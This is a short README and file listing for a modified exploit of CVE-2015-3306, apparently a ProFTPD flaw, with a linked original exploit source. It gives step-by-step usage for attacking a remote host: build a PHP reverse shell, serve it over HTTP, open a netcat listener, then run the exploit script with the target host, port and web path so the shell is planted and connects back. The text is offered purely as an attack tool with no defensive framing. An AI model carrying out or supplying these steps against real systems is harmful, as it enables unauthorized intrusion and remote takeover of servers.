# Modified-CVE-2015-3306-Exploit
# How to
1. Create a php reverse shell
2. Start server to host shell in the same directory (python3 -m http.server)
3. Start netcat listener on local port of choice example: (nc -nlvp [port of choice])
4. Run exploit example provided below (python3 modified_CVE_2015_3306.py --host [remote host] --port [most likely port 21] --path [/var/www or /var/www/html] --shell [name of php shell] --lhost [port of netcat listener] --server_port [port of server hosting shell]

Original exploit source code: https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py
[4.0K] /data/pocs/376ca900b7547dce940f0417db7fe14ebf211bcb
├── [123K] cve-2015-3306.png
├── [3.3K] modified_cve_2015_3306.py
└── [ 628] README.md
0 directories, 3 files
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